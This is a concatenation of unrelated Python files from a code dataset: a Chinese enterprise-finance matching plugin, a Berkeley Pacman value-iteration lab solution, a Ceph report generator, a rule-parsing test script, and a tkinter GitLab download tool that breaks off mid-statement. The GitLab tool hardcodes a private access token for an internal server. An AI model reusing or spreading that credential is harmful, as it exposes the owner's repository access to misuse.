\"\"\"\r\n logging.debug(\"{0}.__generate_hist_name_for_query starting...\".format(self.__class__.__name__))\r\n item_list = [\"(\", \"(\", \")\", \")\", u\"(\", u\"(\", u\")\", u\")\"]\r\n status = 0\r\n for item in item_list:\r\n if item in inname_text:\r\n status = 1\r\n break\r\n if status == 1:\r\n result = (\r\n '(history_names:\"{0}\" OR history_names:\"{1}\" OR history_names:\"{2}\" OR history_names:\"{3}\" '\r\n 'OR history_names:\"{4}\" OR history_names:\"{5}\" OR history_names:\"{6}\")'\r\n ).format(\r\n inname_text,\r\n inname_text.replace(\"(\", \"(\").replace(u\"(\", u\"(\"),\r\n inname_text.replace(\")\", \")\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(u\"(\", u\"(\"),\r\n inname_text.replace(\")\", \")\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\"),\r\n inname_text.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n )\r\n else:\r\n result = 'history_names:\"{0}\"'.format(inname_text)\r\n logging.debug(\"{0}.__generate_hist_name_for_query end.\".format(self.__class__.__name__))\r\n return result\r\n\r\n def __trim_char(self, content):\r\n \"\"\"\r\n 清空文中的空格及换行符\r\n :param content:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__trim_char starting...\".format(self.__class__.__name__))\r\n keywords = [\" \", \" \", \" \", \" \", \"\\r\", \"\\n\", \"\\t\", u\" \", u\" \", u\" \", u\" \", u\"\\r\", u\"\\n\", u\"\\t\"]\r\n for key in keywords:\r\n content = content.replace(key, \"\")\r\n logging.debug(\"{0}.__trim_char end.\".format(self.__class__.__name__))\r\n return content.strip()\r\n\r\n def __trim_brackets(self, content):\r\n \"\"\"\r\n 清空文中所有的括号\r\n :param content:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__trim_brackets starting...\".format(self.__class__.__name__))\r\n keywords = [\r\n \"(\", \")\", \"<\", \">\", \"[\", \"]\", \"{\", \"}\", \"《\", \"》\", \"【\", \"】\", \"(\", \")\", \"[\", \"]\", \"〔\", \"〕\",\r\n \"/\", \"/\", u\"(\", u\")\", u\"<\", u\">\", u\"[\", u\"]\", u\"{\", u\"}\", u\"《\", u\"》\", u\"【\", u\"】\", u\"(\", u\")\",\r\n u\"[\", u\"]\", u\"〔\", u\"〕\", u\"/\", u\"/\"\r\n ]\r\n for key in keywords:\r\n content = content.replace(key, \"\")\r\n logging.debug(\"{0}.__trim_brackets end.\".format(self.__class__.__name__))\r\n return content.strip()\r\n\r\n def __is_in_history_names(self, ename, history_names_str):\r\n \"\"\"\r\n 检查ename是否是历史名称\r\n :param ename:\r\n :param history_names_str:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__is_in_history_names starting...\".format(self.__class__.__name__))\r\n result = False\r\n hist_name_list = history_names_str.split(\" \")\r\n for hist_name in hist_name_list:\r\n name_a = self.__trim_char(self.__trim_brackets(ename))\r\n name_b = self.__trim_char(self.__trim_brackets(hist_name))\r\n if name_a == name_b:\r\n result = True\r\n break\r\n logging.debug(\"{0}.__is_in_history_names end.\".format(self.__class__.__name__))\r\n return result\r\n\r\n def __find_ent(self, ename):\r\n \"\"\"\r\n 根据企业名查找数据库数据\r\n :param ename:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__find_ent starting...\".format(self.__class__.__name__))\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": ename})\r\n if db_result is None:\r\n if \"(\" in ename:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左英文,右中文\r\n if db_result is None:\r\n temp_name = ename.replace(\")\", \")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左中文,右英文\r\n if db_result is None:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(\")\", \")\").replace(u\"(\", u\"(\")\\\r\n .replace(u\")\", u\")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n elif \"(\" in ename:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(u\"(\", u\"(\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左中文,右英文\r\n if db_result is None:\r\n temp_name = ename.replace(\")\", \")\").replace(u\")\", u\")\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 左英文,右中文\r\n if db_result is None:\r\n temp_name = ename.replace(\"(\", \"(\").replace(\")\", \")\").replace(\"(\", \"(\").replace(u\"(\", u\"(\")\\\r\n .replace(u\")\", u\")\").replace(u\"(\", u\"(\")\r\n db_result = MongoDBDAO.find_one(\"GS\", \"enterprises\", {\"name\": temp_name})\r\n # 按历史名称查\r\n if db_result is None:\r\n search_count = 0\r\n ops_result = {}\r\n while search_count < 3:\r\n search_count += 1\r\n ops_result = AliOpenSearch.search(\r\n CONFIG_OPS_COMMON[\"index_name\"],\r\n # \"u_source:'9' AND {0}&&sort=reg_capi\".format(self.__generate_hist_name_for_query(ename))\r\n \"{0}&&sort=reg_capi\".format(self.__generate_hist_name_for_query(ename))\r\n )\r\n if ops_result[\"status\"] != \"OK\":\r\n time.sleep(0.1)\r\n continue\r\n else:\r\n break\r\n if ops_result[\"status\"] == \"OK\" and ops_result[\"result\"][\"num\"] > 0:\r\n hist_last_update_date = \"\"\r\n for item in ops_result[\"result\"][\"items\"]:\r\n status01 = not CommonUtils.is_str_empty_or_null(item[\"id\"])\r\n status02 = self.__is_in_history_names(ename,item[\"history_names\"])\r\n status03 = item[\"last_update_date\"] > hist_last_update_date\r\n if status01 and status02 and status03:\r\n history_id = item[\"id\"]\r\n hist_last_update_date = item[\"last_update_date\"]\r\n db_result = {\"eid\": history_id}\r\n logging.debug(\"{0}.__find_ent end.\".format(self.__class__.__name__))\r\n return db_result\r\n\r\n def __reset_db_records(self, db_records, data_instance, eid):\r\n \"\"\"\r\n 重置数据库数据\r\n :param db_records:\r\n :param data_instance:\r\n :param eid:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__reset_db_records starting...\".format(self.__class__.__name__))\r\n be_chosen = False\r\n try:\r\n data_md5_index = data_instance.dict.get(\"md5_index\")\r\n\r\n # 筛选融资轮次最多的数据\r\n chosen_record = None\r\n for db_record in db_records:\r\n finance_size = len(db_record.get(\"finances\", [])) + len(db_record.get(\"acquisition\", []))\r\n logging.debug(\"{0}.finance_size: {1}\".format(eid, finance_size))\r\n compared_size = 0\r\n if chosen_record:\r\n compared_size = len(chosen_record.get(\"finances\", [])) + len(chosen_record.get(\"acquisition\", []))\r\n logging.debug(\"{0}.compared_size: {1}\".format(eid, compared_size))\r\n if finance_size >= compared_size:\r\n chosen_record = db_record\r\n\r\n logging.debug(\"{0} chosen_record: {1}\".format(eid, chosen_record))\r\n if chosen_record:\r\n logging.debug(\"{0} chosen record md5_index: {1}\".format(eid, chosen_record.get(\"md5_index\")))\r\n # 判断当前数据是否是融资轮次最多的\r\n if chosen_record.get(\"md5_index\") == data_md5_index:\r\n be_chosen = True\r\n\r\n # 将融资轮次较少的数据的eid置为空\r\n for record in db_records:\r\n if record.get(\"md5_index\") != chosen_record.get(\"md5_index\"):\r\n logging.debug(\"I'll set eid({0}) null({1})\".format(eid, record.get(\"md5_index\")))\r\n db_query = {\"md5_index\": record[\"md5_index\"]}\r\n update_data = {\r\n \"$set\": {\"eid\": \"\"},\r\n \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n }\r\n MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n except Exception as e:\r\n logging.exception(\"__reset_db_records error!\")\r\n logging.debug(\"{0}.__reset_db_records end.\".format(self.__class__.__name__))\r\n return be_chosen\r\n\r\n def __get_finance_date(self, finances):\r\n \"\"\"\r\n 获取融资状态\r\n :param finances:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__get_finance_date starting...\".format(self.__class__.__name__))\r\n finance_date = \"0000-00-00\"\r\n try:\r\n for finance in finances:\r\n if finance.get(\"date\", \"\") > finance_date:\r\n finance_date = finance[\"date\"]\r\n except Exception as e:\r\n logging.exception(\"__get_finance_date error!\")\r\n logging.debug(\"{0}.__get_finance_date end.\".format(self.__class__.__name__))\r\n return finance_date\r\n\r\n def __build_related_company(self, data_instance):\r\n \"\"\"\r\n 匹配eid\r\n :param data_instance:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.__build_related_company starting...\".format(self.__class__.__name__))\r\n try:\r\n # 获取企业对应的eid\r\n eid = \"\"\r\n if data_instance.dict.get(\"company\"):\r\n db_result = self.__find_ent(data_instance.dict[\"company\"])\r\n if db_result:\r\n eid = db_result[\"eid\"]\r\n\r\n # 查找eid对应的数据\r\n count = 0\r\n db_records = list()\r\n logging.debug(\"{0}.eid: ({1})\".format(self.__class__.__name__, eid))\r\n if len(eid)>0:\r\n db_query = {\"eid\": eid}\r\n db_result = MongoDBDAO.find(\"GS\", \"juziit_finances\", db_query)\r\n if db_result:\r\n for db_record in db_result:\r\n count += 1\r\n db_records.append(db_record)\r\n\r\n # 处理eid对应的多条数据\r\n be_chosen = True\r\n logging.debug(\"{0}.eid({1}).count: ({2})\".format(self.__class__.__name__, eid, count))\r\n if count > 1:\r\n be_chosen = self.__reset_db_records(db_records, data_instance, eid)\r\n elif count == 1:\r\n if data_instance.dict[\"md5_index\"] != db_records[0][\"md5_index\"]:\r\n data_finance_date = self.__get_finance_date(\r\n data_instance.dict.get(\"finances\", []) + data_instance.dict.get(\"acquisition\", []))\r\n db_finance_date = self.__get_finance_date(\r\n db_records[0].get(\"finances\", []) + db_records[0].get(\"acquisition\", [])\r\n )\r\n if data_finance_date <= db_finance_date:\r\n be_chosen = False\r\n else:\r\n db_query = {\"md5_index\": db_records[0][\"md5_index\"]}\r\n update_data = {\r\n \"$set\": {\"eid\": \"\"},\r\n \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n }\r\n MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n\r\n # data_finance_size = len(data_instance.dict.get(\"finances\", [])) + len(data_instance.dict.get(\"acquisition\", []))\r\n # db_finance_size = len(db_records[0].get(\"finances\", [])) + len(db_records[0].get(\"acquisition\", []))\r\n # if data_finance_size <= db_finance_size:\r\n # be_chosen = False\r\n # else:\r\n # db_query = {\"md5_index\": db_records[0][\"md5_index\"]}\r\n # update_data = {\r\n # \"$set\": {\"eid\": \"\"},\r\n # \"$setOnInsert\": {\"created_time\": datetime.datetime.utcnow()}\r\n # }\r\n # MongoDBDAO.update_one(\"GS\", \"juziit_finances\", db_query, update_data)\r\n\r\n # 给eid赋值\r\n if be_chosen:\r\n logging.debug(\"finally, I'll set {0}'s eid {1}\".format(data_instance.dict[\"md5_index\"], eid))\r\n data_instance.dict[\"eid\"] = eid\r\n else:\r\n data_instance.dict[\"eid\"] = \"\"\r\n except Exception as e:\r\n logging.exception(\"__build_related_company error!\")\r\n logging.debug(\"{0}.__build_related_company end.\".format(self.__class__.__name__))\r\n return\r\n\r\n def process(self, data_instance):\r\n \"\"\"\r\n 接口函数\r\n :param data_instance:\r\n :return:\r\n \"\"\"\r\n logging.debug(\"{0}.process starting...\".format(self.__class__.__name__))\r\n if isinstance(data_instance.dict, list):\r\n data_instance.dict = data_instance.dict[0]\r\n if \"content\" in data_instance.dict.keys():\r\n return\r\n self.__build_related_company(data_instance)\r\n logging.debug(\"{0}.process starting...\".format(self.__class__.__name__))\r\n","sub_path":"source/src/plugins/Finances/FinancesPrePlugin01.py","file_name":"FinancesPrePlugin01.py","file_ext":"py","file_size_in_byte":14577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"565074500","text":"# valueIterationAgents.py\r\n# -----------------------\r\n# Licensing Information: You are free to use or extend these projects for\r\n# educational purposes provided that (1) you do not distribute or publish\r\n# solutions, (2) you retain this notice, and (3) you provide clear\r\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\r\n# \r\n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\r\n# The core projects and autograders were primarily created by John DeNero\r\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\r\n# Student side autograding was added by Brad Miller, Nick Hay, and\r\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\r\n\r\n\r\nimport mdp, util\r\n\r\nfrom learningAgents import ValueEstimationAgent\r\n\r\nclass ValueIterationAgent(ValueEstimationAgent):\r\n \"\"\"\r\n * Please read learningAgents.py before reading this.*\r\n\r\n A ValueIterationAgent takes a Markov decision process\r\n (see mdp.py) on initialization and runs value iteration\r\n for a given number of iterations using the supplied\r\n discount factor.\r\n \"\"\"\r\n def __init__(self, mdp, discount = 0.9, iterations = 100):\r\n \"\"\"\r\n Your value iteration agent should take an mdp on\r\n construction, run the indicated number of iterations\r\n and then act according to the resulting policy.\r\n\r\n Some useful mdp methods you will use:\r\n mdp.getStates()\r\n mdp.getPossibleActions(state)\r\n mdp.getTransitionStatesAndProbs(state, action)\r\n mdp.getReward(state, action, nextState)\r\n mdp.isTerminal(state)\r\n \"\"\"\r\n self.mdp = mdp\r\n self.discount = discount\r\n self.iterations = iterations\r\n self.values = util.Counter() # A Counter is a dict with default 0\r\n\r\n self.mdp = mdp\r\n self.discount = discount\r\n self.iterations = iterations\r\n self.values = util.Counter() # A Counter is a dict with default 0\r\n\r\n #print self.mdp.getStates()\r\n\r\n #for s in self.mdp.getStates():\r\n #print self.values[s]\r\n\r\n state_qval = 0\r\n for i in range(iterations):\r\n valuesCopy = self.values.copy()\r\n for s in self.mdp.getStates():\r\n #state_qval = self.values[s]\r\n state_qval = None\r\n qval_temp = None\r\n for a in self.mdp.getPossibleActions(s):\r\n qval_temp = self.computeQValueFromValues(s,a)\r\n #print 'Hello'\r\n #print self.getTransitionStatesAndProbs(s,a)\r\n if (state_qval == None) or (qval_temp > state_qval):\r\n state_qval = qval_temp\r\n if qval_temp == None:\r\n state_qval = 0\r\n #self.values[s] = state_qval\r\n valuesCopy[s] = state_qval\r\n self.values = valuesCopy\r\n\r\n\r\n def getValue(self, state):\r\n \"\"\"\r\n Return the value of the state (computed in __init__).\r\n \"\"\"\r\n return self.values[state]\r\n\r\n\r\n def computeQValueFromValues(self, state, action):\r\n \"\"\"\r\n Compute the Q-value of action in state from the\r\n value function stored in self.values.\r\n \"\"\"\r\n final_qval=0\r\n #print 'Hello'\r\n #print self.mdp.getTransitionStatesAndProbs(state,action)\r\n\r\n for t in range(len(self.mdp.getTransitionStatesAndProbs(state,action))):\r\n tup = self.mdp.getTransitionStatesAndProbs(state,action)\r\n final_qval += (tup[t-1])[1]*(self.mdp.getReward(state, action, (tup[t-1])[0]) + self.discount*(self.values[(tup[t-1])[0]]))\r\n\r\n return final_qval\r\n\r\n def computeActionFromValues(self, state):\r\n \"\"\"\r\n The policy is the best action in the given state\r\n according to the values currently stored in self.values.\r\n\r\n You may break ties any way you see fit. Note that if\r\n there are no legal actions, which is the case at the\r\n terminal state, you should return None.\r\n \"\"\"\r\n actions = self.mdp.getPossibleActions(state)\r\n\r\n if len(actions) == 0:\r\n return None\r\n\r\n max_action = 0\r\n final_action = ''\r\n final_qval = 0\r\n for action in actions:\r\n final_qval = self.computeQValueFromValues(state,action)\r\n if final_qval == None:\r\n print('Hello world')\r\n if max_action == 0 or final_qval > max_action:\r\n max_action = final_qval\r\n final_action = action\r\n\r\n return final_action\r\n\r\n def getPolicy(self, state):\r\n return self.computeActionFromValues(state)\r\n\r\n def getAction(self, state):\r\n \"Returns the policy at the state (no exploration).\"\r\n return self.computeActionFromValues(state)\r\n\r\n def getQValue(self, state, action):\r\n return self.computeQValueFromValues(state, action)\r\n","sub_path":"Lab/lab12/valueIterationAgents.py","file_name":"valueIterationAgents.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363831029","text":"import shutil\nimport logging\nimport urllib.request\nfrom pathlib import Path\nfrom urllib.error import URLError\nfrom typing import Optional, List, Any, Tuple\n\nlogger = logging.getLogger('report')\n\nfrom . import html\n\n\nclass Report:\n def __init__(self, cluster_name: str, output_file_name: str) -> None:\n self.cluster_name = cluster_name\n self.output_file_name = output_file_name\n self.style: List[str] = []\n self.style_links: List[str] = []\n self.script_links: List[str] = []\n self.scripts: List[str] = []\n self.divs: List[Tuple[str, Optional[str], Optional[str], str]] = []\n self.onload: List[str] = [\"onHashChanged()\"]\n\n def add_block(self, name: str, header: Optional[str], block_obj: Any, menu_item: str = None):\n if menu_item is None:\n menu_item = header\n self.divs.append((name, header, menu_item, str(block_obj)))\n\n def insert_js_css(self, link: str, embed: bool, static_files_dir: Path, output_dir: Path) -> Tuple[bool, str]:\n def get_path(link: str) -> Tuple[bool, str]:\n if link.startswith(\"http://\") or link.startswith(\"https://\"):\n return False, link\n fname = link.rsplit('/', 1)[-1]\n return True, str(static_files_dir / fname)\n\n local, fname = get_path(link)\n data = None\n\n if local:\n if embed:\n data = open(fname, 'rb').read().decode(\"utf8\")\n else:\n shutil.copyfile(fname, output_dir / Path(fname).name)\n else:\n try:\n data = urllib.request.urlopen(fname, timeout=10).read().decode(\"utf8\")\n except (TimeoutError, URLError):\n logger.warning(f\"Can't retrieve {fname}\")\n\n if data is not None:\n return True, data\n else:\n return False, link\n\n def make_body(self, embed: bool, output_dir: Path, static_files_dir) -> html.Doc:\n self.style_links.append(\"bootstrap.min.css\")\n self.style_links.append(\"report.css\")\n self.script_links.append(\"report.js\")\n self.script_links.append(\"sorttable_utf.js\")\n\n links: List[str] = []\n\n for link in self.style_links + self.script_links:\n is_data, link_or_data = self.insert_js_css(link, embed, static_files_dir, output_dir)\n if is_data:\n if link in self.style_links:\n self.style.append(link_or_data)\n else:\n self.scripts.append(link_or_data)\n else:\n links.append(link_or_data)\n\n css_links = links[:len(self.style_links)]\n js_links = links[len(self.style_links):]\n\n doc = html.Doc()\n with doc.html:\n with doc.head:\n doc.title(\"Ceph cluster report: \" + self.cluster_name)\n\n for url in css_links:\n doc.link(href=url, rel=\"stylesheet\", type=\"text/css\")\n\n if self.style:\n doc.style(\"\\n\".join(self.style), type=\"text/css\")\n\n for url in js_links:\n doc.script(type=\"text/javascript\", src=url)\n\n onload = \" \" + \";\\n \".join(self.onload)\n self.scripts.append(f'function onload(){{\\n{onload};\\n}}')\n code = \";\\n\".join(self.scripts)\n\n if embed:\n doc.script(code, type=\"text/javascript\")\n else:\n (output_dir / \"onload.js\").open(\"w\").write(code)\n doc.script(type=\"text/javascript\", src=\"onload.js\")\n with doc.body(onload=\"onload()\"):\n with doc.div(_class=\"menu-ceph\"):\n with doc.ul():\n for idx, div in enumerate(self.divs):\n if div is not None:\n name, _, menu, _ = div\n if menu:\n if menu.endswith(\":\"):\n menu = menu[:-1]\n doc.li.span(menu,\n _class=\"menulink\",\n onclick=f\"clicked('{name}')\",\n id=f\"ptr_{name}\")\n\n for div in self.divs:\n doc(\"\\n\")\n if div is not None:\n name, header, menu_item, block = div\n with doc.div(_class=\"data-ceph\", id=name):\n if header is None:\n doc(block)\n else:\n doc.H3.center(header)\n doc.br\n\n if block != \"\":\n doc.center(block)\n return doc\n\n def save_to(self, output_dir: Path, pretty_html: bool = False,\n embed: bool = False, encrypt: str = None):\n\n static_files_dir = Path(__file__).absolute().parent.parent / \"html_js_css\"\n doc = self.make_body(embed, output_dir, static_files_dir)\n\n if encrypt:\n assert embed\n body_s = str(doc) + \" \"\n if len(body_s) % 32:\n body_s += \" \" * (32 - len(body_s) % 32)\n\n import os\n import base64\n from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n from cryptography.hazmat.backends import default_backend\n\n backend = default_backend()\n iv = os.urandom(16)\n cipher = Cipher(algorithms.AES(encrypt), modes.CBC(iv), backend=backend)\n encryptor = cipher.encryptor()\n encrypted_body = iv + encryptor.update(body_s.encode(\"utf8\")) + encryptor.finalize()\n encrypted_body_base64 = base64.b64encode(encrypted_body)\n\n step = 128\n header = 'encrypted = \"'\n idx = step - len(header)\n header += encrypted_body_base64[0: idx] + '\"'\n parts = [header]\n while idx < len(encrypted_body_base64):\n parts.append(' + \"' + encrypted_body_base64[idx: idx + step] + '\"')\n idx += step\n\n enc_code = \" \\\\\\n \".join(parts)\n doc = html.Doc()\n _, link_or_data = self.insert_js_css(\"aesjs.js\", embed, static_files_dir, output_dir)\n\n with doc.head:\n doc.script(type=\"text/javascript\", src=link_or_data)\n doc.script(type=\"text/javascript\")(enc_code)\n\n with doc.body.center:\n doc('Report encrypted, to encrypt enter password and press \"decrypt\": ')\n doc.input(type=\"password\", id=\"password\")\n doc.input(type=\"button\",\n onclick=\"decode(document.getElementById('password').value)\",\n value=\"Decrypt\")\n\n index = f\"<!doctype html>{doc}\"\n index_path = output_dir / self.output_file_name\n try:\n if pretty_html:\n from bs4 import BeautifulSoup\n index = BeautifulSoup.BeautifulSoup(index).prettify()\n except:\n pass\n index_path.open(\"w\").write(index)\n\n","sub_path":"ceph_monitoring/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"450719528","text":"import glob, os\nimport csv\nfrom random import randint\nimport random\nimport __builtin__\nimport datetime\nimport json\nfrom pprint import pprint\nimport shutil\nimport string\nimport xdrlib\nimport codecs\nfrom distutils.util import strtobool\n\n\ndef main():\n result = False\n with codecs.open('C:\\gitworkspace\\TestAutomation-AKCC5XX\\Test_Automation\\SourceCode\\Dependent_Files\\Latest_CDF\\device.jso',encoding='utf-8') as data_file:\n content = data_file.read()\n content = content.replace(u'\\ufeff','') \n data = json.loads(content)\n Parameter_Count = len(data[\"Parameters\"])\n \n x = \"(RuleId == 23) return GetVar(189) != 6 && GetVar(189) != 7 && GetVar(138) == 1 && ((GetVar(199) == 7) || (GetVar(200) == 7) || (GetVar(201) == 7))\"\n myItem = \"RuleId\"\n if myItem in x:\n array_1 = []\n for y in x.split('return'):\n if \"RuleId\" in y: \n Id = ''.join(filter(lambda x: x.isdigit(),y))\n \n if \"GetVar\" in y:\n visibleText= \"\"\n y = y.replace(\";\", \"\")\n for z in y.split(\" \"):\n if \"GetVar(\" in z:\n Rule = z.replace(\"GetVar(\", \"\").replace(\")\", \"\")\n \n if \"(\" in Rule:\n test.log(\"IF \"+str(Rule))\n Rule = Rule.replace(\"(\", \"\")\n test.log(\"IF2 \"+str(Rule))\n for i in range (0, Parameter_Count):\n Rule_Idx = data[\"Parameters\"][i][\"Idx\"]\n if (Rule == str(Rule_Idx)):\n Rule_Idx_ID = data[\"Parameters\"][Rule_Idx][\"UniqueID\"]\n visibleText += \"(Id_\"+str(Rule_Idx_ID)+\" \"\n \n \n else:\n test.log(\"ELSE \"+str(Rule))\n for i in range (0, Parameter_Count):\n Rule_Idx = data[\"Parameters\"][i][\"Idx\"]\n if (Rule == str(Rule_Idx)):\n Rule_Idx_ID = data[\"Parameters\"][Rule_Idx][\"UniqueID\"]\n visibleText += \"Id_\"+str(Rule_Idx_ID)+\" \"\n \n else:\n visibleText += z+\" \"\n \n ","sub_path":"suite_AK-CC55 Multi coil/In Progress/tst_Visibility_Error_Checking/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"240745290","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/5/16 19:33\n# @Author : zzt\n# @File : fifth.py\n\nimport datetime\nimport os\nimport sys\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport time\nimport threading\n\nimport gitlab\nimport gitlab.v4.objects\n\nfrom page.topUiExcel import GitTopUiInfo\n\n\ndef get_now_time():\n return datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n\n\nPROJECT_INFO = {\n # \"篮球大师\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 37],\n # \"足球大师\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 16],\n \"最佳11人\": ['http://git.wckj.com/', \"Pf7-ssZdX9PE2xpmXg7n\", 83],\n}\n\n\nclass SixthPage(object):\n\n def __init__(self, parent):\n self.parent = parent\n self._branches = {}\n self._client = ''\n self.target_branche = ''\n self._master_name = \"master\"\n self.filters = [\"Merge branch\", \"Lua\"]\n self.target_branche_create_time = \"2020-03-13\"\n self.specify_folder = \"Assets/StaticData\"\n self.target_info = []\n self.create_buttons()\n\n def create_buttons(self):\n self.parent.pack_propagate(0)\n f0 = tk.Frame(self.parent, height=50, width=107)\n # f0.pack(anchor=tk.N, expand=True)\n f0.pack(anchor=tk.N)\n # 添加选择服务器下拉按钮\n com1 = ttk.Combobox(f0, state='readonly')\n com1.bind(\"<<ComboboxSelected>>\", lambda *args: self.choose_project(com1, com2, ''))\n com1.set(' 选 择 项 目')\n com1['values'] = list(PROJECT_INFO.keys())\n com1.grid(row=0, column=0, padx=5, pady=3)\n # 添加选择数据库下拉按钮\n com2 = ttk.Combobox(f0, state='readonly', width=26)\n com2.bind(\"<<ComboboxSelected>>\", lambda *args: self.choose_branch(com2))\n com2.set(' 选 择 分 支')\n com2.grid(row=0, column=1, padx=5, pady=3)\n but1 = tk.Button(f0, text='下载静态文件夹', width=18, height=2, command=lambda: self.button_download_target_files())\n but1.grid(row=0, column=2, padx=5, pady=3)\n # lf_2 = tk.LabelFrame(f0, text='可选')\n # lf_2.grid(row=1, column=0, columnspan=2, pady=3, padx=5)\n # but1 = tk.Button(f0, text='开 始 检 查', width=18, height=2, command=lambda: self.button_check_git())\n # but1.grid(row=0, column=2, padx=5, pady=3)\n # but2 = tk.Button(f0, text='打 印 差 异', width=18, height=2, command=lambda: self.button_download())\n # but2.grid(row=1, column=2, padx=5, pady=3)\n # tk.Label(lf_2, text=\"分支创建时间: \").grid(row=1, column=0, padx=5, pady=3)\n # ent1 = tk.StringVar()\n # tk.Entry(lf_2, text=\"2020-12-25\", textvariable=ent1, width=26).grid(row=1, column=1, padx=5, pady=3)\n # tk.Button(lf_2, text=\"修改创建时间\", width=10, command=lambda: self.change_date(ent1)).grid(row=1, column=2, padx=5,\n # pady=3)\n #\n # ent1.set(self.target_branche_create_time)\n # tk.Label(lf_2, text=\"过滤条件: \").grid(row=2, column=0, padx=5, pady=3)\n # ent2 = tk.StringVar()\n # tk.Entry(lf_2, text=\"Merge branch, Lua\", textvariable=ent2, width=26).grid(row=2, column=1, padx=5, pady=3)\n # tk.Button(lf_2, text=\"修改过滤条件\", width=10, command=lambda: self.change_filter(ent2)).grid(row=2, column=2, padx=5,\n # pady=3)\n # com3 = ttk.Combobox(lf_2, state='readonly', width=26)\n # com3.bind(\"<<ComboboxSelected>>\", lambda *args: self.choose_branch_3(com3))\n # com3.set(' 选择目标分支(默认master)')\n # com3.grid(row=3, column=1, padx=5, pady=3)\n #\n # ent2.set(\"Merge branch, Lua\")\n # 日志文本\n labelf = tk.LabelFrame(self.parent, text='日志文本:')\n labelf.pack(anchor=tk.N, expand=True)\n sb = tk.Scrollbar(labelf)\n sb.pack(side=tk.RIGHT, fill=tk.Y)\n self.tex = tk.Text(labelf, height=28, yscrollcommand=sb.set, width=107)\n self.tex.pack(side=tk.LEFT, fill=tk.BOTH)\n sb.config(command=self.tex.yview)\n self.tex.tag_config('tag1', foreground='green')\n self.tex.tag_config('tag2', foreground='red')\n # 添加其他按钮\n tk.Button(self.parent, text='保存日志', command=lambda: self.save_log(self.tex), width=15).pack(anchor=tk.S,\n side=tk.RIGHT,\n padx=3, pady=3)\n tk.Button(self.parent, text='清除日志', command=lambda: self.tex.delete(1.0, tk.END)).pack(anchor=tk.S,\n side=tk.RIGHT, padx=5,\n pady=3)\n\n def button_download_target_files(self):\n start_time = time.time()\n folder = self._project.repository_tree(self.specify_folder)\n first_directory = os.getcwd() + '\\客户端静态文件'\n if not os.path.exists(first_directory):\n os.mkdir(first_directory)\n filename = ''.join([first_directory, '\\\\', get_now_time().replace(':', '_').replace(' ', '_')])\n os.mkdir(filename)\n threading_list = []\n for i in folder:\n if i['type'] == \"tree\":\n self.insert_info(\"文件夹:\" + i['name'])\n deeper_file_name = filename + \"/\" + i['name'] + \"/Cfgs\"\n if not os.path.exists(filename + \"/\" + i['name']):\n os.mkdir(filename + \"/\" + i['name'])\n if not os.path.exists(deeper_file_name):\n os.mkdir(deeper_file_name)\n t = threading.Thread(target=self.download_single_file, args=(i['name'], deeper_file_name))\n t.start()\n threading_list.append(t)\n for i in threading_list:\n i.join()\n self.insert_info(\"下载完毕 and cost time: {}\".format(time.time() - start_time), 1, 1)\n self.insert_info(\"文件夹所在位置 : {}\".format(filename), 1, 1)\n\n\n\n\n\n def download_single_file(self, file_path, deeper_file_name):\n deeper_files = self._project.repository_tree(self.specify_folder + \"/\" + file_path + \"/Cfgs\", all=True, ref=self.target_branche)\n # print(\"deeper_files:\", len(deeper_files))\n # index = 1\n for j in deeper_files:\n if not j['name'].endswith(\".meta\"):\n # index += 1\n # self.insert_info(\"第三层:\" + j['name'] + \", style: \" + j['type'])\n try:\n with 